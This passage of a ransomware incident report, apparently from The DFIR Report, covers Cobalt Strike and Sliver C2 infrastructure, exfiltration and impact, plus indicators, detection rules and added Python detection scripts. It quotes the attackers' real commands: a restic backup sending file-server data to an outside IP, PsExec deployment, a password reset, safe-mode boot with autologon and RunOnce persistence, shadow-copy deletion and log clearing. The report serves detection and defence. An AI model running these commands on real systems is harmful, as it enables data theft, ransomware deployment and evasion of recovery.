SSH_Password_Pubkey              - Not Found
SSH_Banner                       -
HttpGet_Verb                     - GET
HttpPost_Verb                    - POST
HttpPostChunk                    - 0
Spawnto_x86                      - %windir%\syswow64\gpupdate.exe
Spawnto_x64                      - %windir%\sysnative\gpupdate.exe
CryptoScheme                     - 0
Proxy_Config                     - Not Found
Proxy_User                       - Not Found
Proxy_Password                   - Not Found
Proxy_Behavior                   - Use IE settings
Watermark_Hash                   - 3Hh1YX4vT3i5C7L2sn7K4Q==
Watermark                        - 587247372
bStageCleanup                    - True
bCFGCaution                      - True
KillDate                         - 0
bProcInject_StartRWX             - True
bProcInject_UseRWX               - False
bProcInject_MinAllocSize         - 16700
ProcInject_PrependAppend_x86     - b'\x90\x90\x90'
                                   Empty
ProcInject_PrependAppend_x64     - b'\x90\x90\x90\x90\x90\x90\x90\x90\x90'
                                   Empty
ProcInject_Execute               - ntdll.dll:RtlUserThreadStart
                                   SetThreadContext
                                   NtQueueApcThread-s
                                   kernel32.dll:LoadLibraryA
                                   CreateRemoteThread
                                   RtlCreateUserThread
ProcInject_AllocationMethod      - NtMapViewOfSection
bUsesCookies                     - False
HostHeader                       -
headersToRemove                  - Not Found
DNS_Beaconing                    - Not Found
DNS_get_TypeA                    - Not Found
DNS_get_TypeAAAA                 - Not Found
DNS_get_TypeTXT                  - Not Found
DNS_put_metadata                 - Not Found
DNS_put_output                   - Not Found
DNS_resolver                     - Not Found
DNS_strategy                     - round-robin
DNS_strategy_rotate_seconds      - -1
DNS_strategy_fail_x              - -1
DNS_strategy_fail_seconds        - -1
Retry_Max_Attempts               - 0
Retry_Increase_Attempts          - 0
Retry_Duration                   - 0


Both Cobalt Strike C2 servers returned the HTTP response classically associated
with the post-exploitation framework:

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Day, DD Mmm YYYY HH:MM:SS GMT
Content-Length: 0





A closer look at the two command and control servers showed that both also
exposed an HTTP service on port 81 that returned the following response.



The following FOFA query was therefore built to identify further potential C2
servers matching this pattern.

"HTTP/1.1 307 Temporary Redirect" && "Content-Type: text/html; charset=utf-8" && "Location: https://www.cloudflare.com/" && "Content-Length: 63" && port="81" && protocol="http"
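The two response patterns above, the bare 404 on the beacon port and the 307 redirect on port 81, can be turned into a fingerprint check that runs over responses collected by a scanner. The following Python is an added example, not code from The DFIR Report: the header values are copied from the two responses shown in this section, the sample responses and the function names are my own, and the dates are placeholders.

```python
"""Fingerprint scanner-collected HTTP responses against the two patterns in the report.

Added example (not from The DFIR Report).  The header tuples are the ones the
report shows; the sample responses below are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class HttpResponse:
    status: int
    headers: dict  # lower-cased header name -> value


def parse_response(raw: str) -> HttpResponse:
    """Parse a raw HTTP/1.x response (status line plus headers); the body is ignored."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    version, status, *_ = lines[0].split(" ", 2)
    if not version.startswith("HTTP/"):
        raise ValueError("not an HTTP status line")
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpResponse(int(status), headers)


def is_cobalt_strike_default_404(resp: HttpResponse) -> bool:
    """Pattern 1: 404, text/plain, zero length, and only Content-Type/Date/Content-Length.
    Many unrelated servers answer unknown paths the same way, so this is a weak signal."""
    return (
        resp.status == 404
        and resp.headers.get("content-type") == "text/plain"
        and resp.headers.get("content-length") == "0"
        and set(resp.headers) == {"content-type", "date", "content-length"}
    )


def is_port81_redirector(resp: HttpResponse, port: int) -> bool:
    """Pattern 2: the port-81 redirect to cloudflare.com that the FOFA query encodes."""
    return (
        port == 81
        and resp.status == 307
        and resp.headers.get("content-type") == "text/html; charset=utf-8"
        and resp.headers.get("location") == "https://www.cloudflare.com/"
        and resp.headers.get("content-length") == "63"
    )


def classify(raw: str, port: int) -> list[str]:
    """Return the names of all fingerprints matched by one scanned response."""
    resp = parse_response(raw)
    hits = []
    if is_cobalt_strike_default_404(resp):
        hits.append("cobalt-strike-default-404")
    if is_port81_redirector(resp, port):
        hits.append("port81-cloudflare-redirect")
    return hits


# Constructed sample responses (placeholder dates, not from the case).
SAMPLE_404 = (
    "HTTP/1.1 404 Not Found\r\n"
    "Content-Type: text/plain\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_307 = (
    "HTTP/1.1 307 Temporary Redirect\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Location: https://www.cloudflare.com/\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Content-Length: 63\r\n\r\n"
    "<a href=\"https://www.cloudflare.com/\">Temporary Redirect</a>.\n\n"
)
SAMPLE_NGINX_404 = (  # a generic 404 that must NOT match pattern 1
    "HTTP/1.1 404 Not Found\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 153\r\n\r\n"
)

if __name__ == "__main__":
    for label, raw, port in (("beacon/443", SAMPLE_404, 443),
                             ("redirector/81", SAMPLE_307, 81),
                             ("nginx/443", SAMPLE_NGINX_404, 443)):
        print(label, classify(raw, port))
```

Content-Length 63 is exactly the size of the body that Go's net/http `http.Redirect` writes for a GET redirected to https://www.cloudflare.com/ (`<a href="https://www.cloudflare.com/">Temporary Redirect</a>.` followed by two newlines), and `text/html; charset=utf-8` is the content type it sets, so the port-81 service is consistent with a Go-based redirector. The bare 404 on its own proves little; it is the combination with the port-81 redirect, the certificate pivot below and the JA3/JA3S values that makes the hunt useful.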


Some of the first results returned by this FOFA query had already been reported
by Rapid7 in one of their recent blog posts.



Based on FOFA results, all the identified command and control servers were in
Bulgaria and the Netherlands.

IP              Country
91.92.240.175   BG
91.92.240.194   BG
91.92.241.117   BG
91.92.242.182   BG
91.92.242.39    BG
91.92.242.55    BG
91.92.245.174   BG
91.92.245.175   BG
91.92.247.123   BG
91.92.247.127   BG
91.92.249.110   BG
91.92.250.148   BG
91.92.250.158   BG
91.92.250.60    BG
91.92.250.65    BG
91.92.250.66    BG
91.92.251.240   BG
94.156.67.175   BG
94.156.67.180   BG
94.156.67.185   BG
94.156.67.188   BG
141.98.6.195    NL
193.42.33.14    NL
194.180.48.165  NL
194.180.48.42   NL
194.49.94.21    NL
194.49.94.22    NL

Furthermore, we noticed that four of the IP addresses (91.92.250.158,
91.92.251.240, 94.156.67.175, 94.156.67.180) served an untrusted HTTPS
certificate on port 441 whose attributes were associated with Alibaba, at the
time they were active Cobalt Strike servers.



The certificate serial number (1657766544761773100) was used to pivot to other
servers possibly operated by the same threat actors, and further servers were
found that showed behavior similar to what is described above. For example, the
IP address 185.73.124.238 shares the same certificate and was, at the time of
writing, an active Cobalt Strike C2 server.



As described in a Hunt.io blog post, these specific certificate attributes
(CommonName and Organization) are associated with the use of RedGuard, a C2
redirector.



SLIVER

IP               Port  Ja3                               Ja3s                              ASN Org             ASN      Country
194.49.94.18     8443  19e29534fd49dd27d09234e639c4057e  f4febc55ea12b31ae17cfb7e614afda8  Matrix Telecom Ltd  216,419  The Netherlands
194.169.175.134  8443  d6828e30ab66774a91a96ae93be4ae4c  f4febc55ea12b31ae17cfb7e614afda8  Matrix Telecom Ltd  216,419  The Netherlands

Both the Sliver servers 194.49.94[.]18 and 194.169.175[.]134 had invalid
certificates on port 8443.






EXFILTRATION

The threat actor used Restic, a backup utility, to exfiltrate directories
directly from a file server. Below are the commands used by the threat actor to
initialize the backup repository and exfiltrate the data:

restic.exe -r rest:http://195.123.226.84:8000/ init --password-file ppp.txt
restic.exe -r rest:http://195.123.226.84:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup "F:\Shares\<REDACTED>\<REDACTED>"


The threat actor exfiltrated the data over HTTP to a server hosted on
195.123.226[.]84. The parameters used by the threat actor are:

 * -r rest:...: The -r option specifies the repository where the backup data
   will be stored; this can be anything from an S3 bucket to an SFTP server.
   In this case, the threat actor used a REST server.
 * --password-file: This option reads the repository password from a file, in
   this case ppp.txt.
 * --use-fs-snapshot: This option uses the Windows Volume Shadow Copy Service
   (VSS) when creating backups. According to the Restic documentation, Restic
   transparently creates a VSS snapshot for each volume that contains files to
   back up. Files are read from the VSS snapshot instead of the regular
   filesystem, which allows backing up files that are exclusively locked by
   another process during the backup.
 * --verbose: This option prints a live status of the backup and the processed
   files.

The traffic related to this activity triggered the following Suricata alert: ET
USER_AGENTS Go HTTP Client User-Agent. Investigating the Suricata EVE flow logs
reveals the use of Restic thanks to the Content-Type HTTP header:

http: {
protocol: "HTTP/1.1",
http_content_type: "application/vnd.x.restic.rest.v2"
}
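The Content-Type above is a strong, low-noise indicator, while the Go user agent that fired the ET alert is shared by every Go program. The following Python is an added example, not tooling from The DFIR Report or from Suricata: it scores EVE JSON records so that the Restic content type alone is enough to flag a record and the Go user agent only raises the score. The field names are the standard Suricata EVE `http` fields; the repository path list is an assumption taken from the public restic REST backend layout rather than from the report, and all sample events are constructed with RFC 5737 addresses.

```python
"""Detect Restic REST-backend traffic in Suricata EVE JSON records.

Added example, not part of The DFIR Report's tooling or of Suricata.  The
content type is the one quoted in the report and the record fields are the
standard Suricata EVE 'http' fields; the repository path list is an assumption
(public restic REST backend layout), and every sample event below is constructed.
"""
from __future__ import annotations

import json

RESTIC_CONTENT_TYPE_PREFIX = "application/vnd.x.restic.rest"  # .v1 / .v2 variants
GO_HTTP_UA_PREFIX = "Go-http-client/"  # what "ET USER_AGENTS Go HTTP Client User-Agent" keys on
# Assumption: top-level paths of a restic REST repository (not taken from the report).
RESTIC_REPO_PATHS = ("/config", "/keys", "/data", "/snapshots", "/index", "/locks")


def score_http_event(ev: dict) -> tuple[int, list[str]]:
    """Score one EVE record; the Restic content type alone reaches the default threshold."""
    if ev.get("event_type") != "http":
        return 0, []
    http = ev.get("http", {})
    score, reasons = 0, []

    ctype = http.get("http_content_type", "")
    if ctype.startswith(RESTIC_CONTENT_TYPE_PREFIX):
        score += 3
        reasons.append(f"restic content type {ctype}")

    path = http.get("url", "").split("?", 1)[0]
    if any(path == p or path.startswith(p + "/") for p in RESTIC_REPO_PATHS):
        score += 1
        reasons.append(f"restic repository path {path}")

    ua = http.get("http_user_agent", "")
    if ua.startswith(GO_HTTP_UA_PREFIX):
        score += 1
        reasons.append(f"Go default user agent {ua}")
    return score, reasons


def score_lines(eve_lines: list[str]) -> list[int]:
    """Score every non-empty EVE line, in log order."""
    return [score_http_event(json.loads(line))[0] for line in eve_lines if line.strip()]


def find_restic_traffic(eve_lines: list[str], threshold: int = 3) -> list[dict]:
    """Return flagged records (score >= threshold) with the fields an analyst pivots on."""
    hits = []
    for line in eve_lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        score, reasons = score_http_event(ev)
        if score >= threshold:
            http = ev.get("http", {})
            hits.append({
                "timestamp": ev.get("timestamp"),
                "src": f"{ev.get('src_ip')}:{ev.get('src_port')}",
                "dst": f"{ev.get('dest_ip')}:{ev.get('dest_port')}",
                "method": http.get("http_method"),
                "url": http.get("url"),
                "score": score,
                "reasons": reasons,
            })
    return hits


def _event(url, method, ua, ctype=None, event_type="http"):
    """Build one constructed EVE record as a JSON line."""
    ev = {"timestamp": "2024-01-01T00:00:00.000000+0000", "event_type": event_type,
          "src_ip": "192.0.2.10", "src_port": 49811,
          "dest_ip": "198.51.100.5", "dest_port": 8000, "proto": "TCP"}
    if event_type == "http":
        ev["http"] = {"hostname": "198.51.100.5", "url": url, "http_user_agent": ua,
                      "http_method": method, "protocol": "HTTP/1.1"}
        if ctype:
            ev["http"]["http_content_type"] = ctype
    return json.dumps(ev)


# Constructed sample log: repository init, a config upload, a lock listing,
# an unrelated browser request and a non-HTTP flow record.
SAMPLE_EVE = [
    _event("/?create=true", "POST", "Go-http-client/1.1"),
    _event("/config", "POST", "Go-http-client/1.1"),
    _event("/locks/", "GET", "Go-http-client/1.1", "application/vnd.x.restic.rest.v2"),
    _event("/index.html", "GET", "Mozilla/5.0", "text/html"),
    _event(None, None, None, event_type="flow"),
]

if __name__ == "__main__":
    for hit in find_restic_traffic(SAMPLE_EVE, threshold=2):
        print(hit)
```

With the default threshold only the record carrying the Restic content type is returned; lowering the threshold to 2 also surfaces the earlier `POST /config` from a Go client, which is how the repository initialization in the first restic.exe command would look before any listing response has been seen. The usable lever for defenders is the same one the report points at: a Restic REST server is a distinctive endpoint, and a file server talking to one on the internet warrants a look regardless of the user agent.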



IMPACT

The threat actor dropped and executed two batch scripts, up.bat and 1.bat,
remotely using PsExec on targeted servers to perform various operations.

The up.bat script was executed remotely on a domain controller using the
following command:

cmd.exe /C PsExec64.exe -accepteula \\<DOMAIN-CONTROLLER-IP> -c -f -d -s up.bat


The script contained a one-liner that reset the password of a privileged
service account:

net  user REDACTED JapanNight!128 /domain


The threat actor executed the following command to remotely copy the ransomware
binary to the target machines before running the second batch script:

cmd.exe /C for /f %a in (pc.txt) do copy /y \\<REDACTED>\c$\<REDACTED>.exe \\%a\c$\<REDACTED>.exe


The second script, 1.bat, was then executed on multiple hosts using the
following command:

cmd.exe /C PsExec64.exe -accepteula @pc.txt -c -f -d -h 1.bat


The script contained the following commands:

bcdedit  /set {default} safeboot network 
findstr  /C:"The operation completed successfully." 
reg  add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *a /t REG_SZ /d "cmd.exe /c C:\<REDACTED-COMPANY-NAME>.exe" /f 
findstr  /C:"The operation completed successfully." 
reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d <REDACTED-DOMAIN-NAME>\backup2 /f
reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d JapanNight!128 /f
reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
timeout  /T 10
shutdown  -r -t 0


The above commands were meant to perform the following operations:

 * The first command uses the bcdedit utility to set the default boot
   configuration of the system to "safe mode with networking".
 * The second command uses findstr to check whether the previous command
   executed successfully.
 * The following reg commands modify the registry to enable automatic logon
   with the service account and add the ransomware binary
   <REDACTED-COMPANY-NAME>.exe to
   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce so that it is
   executed at system start-up.
 * The last commands wait 10 seconds (timeout /T 10) and then force an
   immediate system restart (shutdown -r -t 0).

The ransomware binary <REDACTED-COMPANY-NAME>.exe executed multiple files and
utilities; the child and grandchild processes below show the behavior of this
ransomware binary:

C:\<REDACTED-COMPANY-NAME>.exe
----> C:\example.exe C:\example.exe --access-token REDACTED --safeboot-network
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /d Service"
--------> C:\Windows\System32\cmd.exe "cmd" /c "bcdedit /set {current} safeboot network"
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network "
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \"C:\example.exe\""
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network "
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \"C:\example.exe\""
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network "
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \"C:\example.exe\""
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\15991160457623399845550968347370640942 /f"
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /f"
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "sc delete 15991160457623399845550968347370640942"
--------> C:\Windows\System32\cmd.exe "cmd" /c "bcdedit /deletevalue {current} safeboot"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "wmic csproduct get UUID"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "iisreset.exe /stop"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"
------------> C:\Windows\System32\cmd.exe "cmd" /c "vssadmin.exe Delete Shadows /all /quiet"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "arp -a"
------------> C:\Windows\System32\cmd.exe "cmd" /c "wmic.exe Shadowcopy Delete"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "wevtutil.exe el"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "wevtutil.exe cl <MULTIPLE EVENT LOGS> (Executed hundreds of times)


The threat actor executed the binary example.exe, which configured the
ransomware, cleared event logs and deleted volume shadow copies.
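Both the 1.bat script and the example.exe process tree above consist of individually explainable commands whose combination is the tell: a safe-mode boot entry, an automatic logon with a stored password, a RunOnce payload, then shadow copy deletion and event log clearing once the host is up. The following Python is an added example, not code from The DFIR Report: it runs a small set of command-line rules over those observed lines and correlates them into the staging pattern. The regexes and the rule names are mine; the `sigma` field carries the titles from this report's Sigma section where a listed rule covers the same behavior. The sample command lines are copied from the report with its redactions kept, except for the event log name, which is constructed.

```python
"""Triage process command lines for the safe-mode ransomware staging seen in 1.bat
and in the example.exe process tree.

Added example (not from The DFIR Report).  Rule regexes are mine; the 'sigma'
field names the rule titles listed in this report's Sigma section so hits can be
cross-referenced.  Sample command lines are copied from the report with its
redactions kept, except the event log name, which is constructed.
"""
from __future__ import annotations

import re
from collections import Counter

HKLM = r"(HKLM|HKEY_LOCAL_MACHINE)"

RULES = [
    ("safeboot-bcdedit",
     r"bcdedit(\.exe)?\s+/set\s+\{(default|current)\}\s+safeboot\b",
     "Enabling Safeboot with BCDEDIT"),
    ("safeboot-regkey",
     r"reg(\.exe)?\s+add\s+\"?" + HKLM + r"\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\",
     "Add SafeBoot Keys Via Reg Utility"),
    ("winlogon-autologon",
     r"reg(\.exe)?\s+add\s+\"?" + HKLM + r"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\"?"
     r"\s+/v\s+(AutoAdminLogon|DefaultPassword|DefaultUserName)\b",
     None),  # no dedicated rule title on the page's list
    ("runonce-persistence",
     r"reg(\.exe)?\s+add\s+\"?" + HKLM + r"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\b",
     None),
    ("shadow-copy-deletion",
     r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete",
     "Shadow Copies Deletion Using Operating Systems Utilities"),
    ("eventlog-clearing",
     r"wevtutil(\.exe)?\s+cl\b",
     "Suspicious Eventlog Clearing or Configuration Change Activity"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), sigma) for name, pat, sigma in RULES]


def triage(cmdlines: list[str]) -> list[tuple[str, str]]:
    """Return (rule name, command line) for every rule that matches each line."""
    hits = []
    for cmd in cmdlines:
        for name, rx, _sigma in COMPILED:
            if rx.search(cmd):
                hits.append((name, cmd))
    return hits


def summarize(cmdlines: list[str]) -> dict[str, int]:
    """Count hits per rule name."""
    return dict(Counter(name for name, _ in triage(cmdlines)))


def is_safe_mode_ransomware_staging(cmdlines: list[str]) -> bool:
    """The 1.bat pattern: safe-mode boot entry, automatic logon and a RunOnce
    payload on one host.  Each piece alone has benign uses; together they do not."""
    seen = set(summarize(cmdlines))
    return {"safeboot-bcdedit", "winlogon-autologon", "runonce-persistence"} <= seen


# Sample command lines from the report (redactions kept); the wevtutil log name is constructed.
SAMPLE_CMDLINES = [
    r"bcdedit  /set {default} safeboot network",
    r'findstr  /C:"The operation completed successfully."',
    r'reg  add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *a /t REG_SZ /d "cmd.exe /c C:\<REDACTED-COMPANY-NAME>.exe" /f',
    r'reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d <REDACTED> /f',
    r'reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f',
    r"shutdown  -r -t 0",
    r'"cmd" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /d Service"',
    r'"cmd" /c "bcdedit /set {current} safeboot network"',
    r'"cmd" /c "vssadmin.exe Delete Shadows /all /quiet"',
    r'"cmd" /c "wmic.exe Shadowcopy Delete"',
    r'"cmd" /c "wevtutil.exe cl Security"',
    r'"cmd" /c "arp -a"',
]

if __name__ == "__main__":
    for name, cmd in triage(SAMPLE_CMDLINES):
        print(f"{name:22s} {cmd}")
    print("staging pattern:", is_safe_mode_ransomware_staging(SAMPLE_CMDLINES))
```

The rules deliberately match on `reg add` and `bcdedit /set` rather than on the encoder's own `reg delete` and `bcdedit /deletevalue` clean-up calls, since the additions are what a defender wants to catch before the reboot; the correlation helper is the higher-value alert, because a host that receives all three changes within one PsExec session is being prepared to run a payload in a state where most security tooling is not loaded.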



The ransomware options were dissected in Netskope's "BlackCat Ransomware:
Tactics and Techniques From a Targeted Attack" blog post.

Upon the execution of these utilities, the binary started encrypting files and
dropping the ransom note:




TIMELINE



 


DIAMOND MODEL




INDICATORS


ATOMIC

Sliver
194.49.94[.]18:8443
194.169.175[.]134:8443

Cobalt Strike
91.92.250[.]60:443
91.92.250[.]65:443

Staging Tool Server
91.92.245[.]26:443

Exfiltration Server
195.123.226[.]84:8000



COMPUTED

Version.zip
DBF5F56998705C37076B6CAE5D0BFB4D
E6AB3C595AC703AFD94618D1CA1B8EBCE623B21F
5DC8B08C7E1B11ABF2B6B311CD7E411DB16A7C3827879C6F93BD0DAC7A71D321

wo14.py
EB64862F1C8464CA3D03CF0A4AC608F4
6F43E6388B64998B7AA7411104B955A8949C4C63
726F038C13E4C90976811B462E6D21E10E05F7C11E35331D314C546D91FA6D21

worksliv.py
3A4FDBC642A24A240692F9CA70757E9F
794203A4E18F904F0D244C7B3C2F5126B58F6A21
5F7D438945306BF8A7F35CAB0E2ACC80CDC9295A57798D8165EF6D8B86FBB38D

slv.py
7A4CB8261036F35FD273DA420BF0FD5E
9648559769179677C5B58D5619CA8872F5086312
4EF1009923FC12C2A3127C929E0AA4515C9F4D068737389AFB3464C28CCF5925

work.aes
1BE7FE8E20F8E9FDC6FD6100DCAD38F3
C4CDE794CF4A68D63617458A60BC8B90D99823CA
4EE4E1E2CEDF59A802C01FAE9CCFCFDE3E84764C72E7D95B97992ADDD6EDF527

data.aes
4232C065029EB52D1B4596A08568E800
79818110ABD52BA14800CDFF39ECA3252412B232
3298629DE0489C12E451152E787D294753515855DBF1CE80BFCDED584A84AC62

service_probes
637FB65A1755C4B6DC1E0428E69B634E
FBA4652B6DBE0948D4DADCEBF51737A738CA9E67
B3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6

UpdateEG.bat
0B1882F719504799B3211BF73DFDC253
448892D5607124FDD520F62FF0BC972DF801C046
39EC2834494F384028AD17296F70ED6608808084EF403714CFBC1BFBBED263D4

python311.dll
E20FC97E364E859A2FB58D66BC2A1D05
F5F56413F81E8F4A941F53E42A90BA1720823F15
9514035FEA8000A664799E369AE6D3AF6ABFE8E5CDA23CDAFBEDE83051692E63

example.exe
C737A137B66138371133404C38716741
A3E4FB487400D99E3A9F3523AEAA9AF5CF6E128B
25172A046821BD04E74C15DC180572288C67FDFF474BDB5EB11B76DCE1B3DAD3

2-REDACTED-51.exe
7A1E7F652055C812644AD240C41D904A
B39C244C3117F516CE5844B2A843EFF1E839207C
5FAC60F1E97B6EAAE18EBD8B49B912C86233CF77637590F36AA319651582D3C4

domain_name.exe
E0D1CF0ABD09D7632F79A8259283288D
3A78CE27A7AA16A8230668C644C7DF308DE6CF33
D15CAB3901E9A10AF772A0A1BDBF35B357EE121413D4CF542D96819DC4471158



DETECTIONS


NETWORK

ETPRO JA3 Hash - Possible Ligolo Server/Golang Binary Response
ET USER_AGENTS Go HTTP Client User-Agent
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET POLICY SMB Executable File Transfer
ET POLICY PsExec service created
ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement
ET POLICY Powershell Activity Over SMB - Likely Lateral Movement
ET POLICY SMB2 NT Create AndX Request For a .bat File
ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
ET INFO Suspected Impacket WMIExec Activity
ET INFO Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI)
ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection
ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check
ETPRO USER_AGENTS Observed Suspicious UA (Mozilla/5.0)



SIGMA

Search rules on detection.fyi or sigmasearchengine.com

DFIR Public Rules Repo:

DFIR Private Rules:

934fa692-f2fa-4465-8bb3-ee1d4c0718cc : Enabling Safeboot with BCDEDIT
181f510b-0b3c-4e05-939c-7623a4a9c82c : Execution of Python Scripts in AppData Directory
6f77de5c-27af-435b-b530-e2d07b77a980 : Impacket Tool Execution
d2722770-3295-478e-bd58-c3c18baaa821 : Modification of UserInit Registry Value
3f684d2e-4760-4db9-a578-3698e21a01d5 : Modification of UserInit Registry Value
2249fc47-1825-4137-b9ce-aa65749bb68c : Restic Backup Tool Misuse


Sigma Repo:

5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE
968eef52-9cff-4454-8992-1e74b9cbad6c : Reconnaissance Activity
8d5aca11-22b3-4f22-b7ba-90e60533e1fb : Wmiexec Default Output File
526be59f-a573-4eea-b5f7-f0973207634d : New Process Created Via Wmic.EXE
7cccd811-7ae9-4ebe-9afd-cb5c406b824b : Potential Execution of Sysinternals Tools
42c575ea-e41e-41f1-b248-8093c3e82a28 : PsExec Service Installation
8eef149c-bd26-49f2-9e5a-9b00e3af499b : Pass the Hash Activity 2
192a0330-c20b-4356-90b6-7b7049ae0b8 : Successful Overpass the Hash Attempt
d7662ff6-9e97-4596-a61d-9839e32dee8d : Add SafeBoot Keys Via Reg Utility
cc36992a-4671-4f21-a91d-6c2b72a2edf5 : Suspicious Eventlog Clearing or Configuration Change Activity
c947b146-0abc-4c87-9c64-b17e9d7274a2 : Shadow Copies Deletion Using Operating Systems Utilities
dcd74b95-3f36-4ed9-9598-0490951643aa : PowerView PowerShell Cmdlets - ScriptBlock



YARA

TBD

External Rules:

https://github.com/RussianPanda95/Yara-Rules/blob/main/Nitrogen/mal_nitrogen.yar
https://github.com/RussianPanda95/Yara-Rules/blob/main/Nitrogen/nitrogen_python311.yar
https://github.com/ditekshen/detection/blob/master/yara/malware.yar#L9267-L9289
https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_COFFLoader.yar
 


MITRE ATT&CK



Account Manipulation - T1098
Clear Windows Event Logs - T1070.001
Data Encrypted for Impact - T1486
Data from Network Shared Drive - T1039
DLL Side-Loading - T1574.002
Domain Groups - T1069.002
Domain Trust Discovery - T1482
Drive-by Compromise - T1189
Dynamic-link Library Injection - T1055.001
Encrypted/Encoded File - T1027.013
Exfiltration Over Alternative Protocol - T1048
Ingress Tool Transfer - T1105
Inhibit System Recovery - T1490
Lateral Tool Transfer - T1570
Local Account - T1087.001
Local Groups - T1069.001
LSASS Memory - T1003.001
Malicious File - T1204.002
Masquerading - T1036
Match Legitimate Name or Location - T1036.005
Network Share Discovery - T1135
PowerShell - T1059.001
Process Injection - T1055
Python - T1059.006
Remote Desktop Protocol - T1021.001
Remote System Discovery - T1018
Safe Mode Boot - T1562.009
Scheduled Task - T1053.005
Service Execution - T1569.002
SMB/Windows Admin Shares - T1021.002
Web Protocols - T1071.001
Windows Command Shell - T1059.003
Windows Management Instrumentation - T1047
Winlogon Helper DLL - T1547.004


Internal case #TB25590 #PR32467

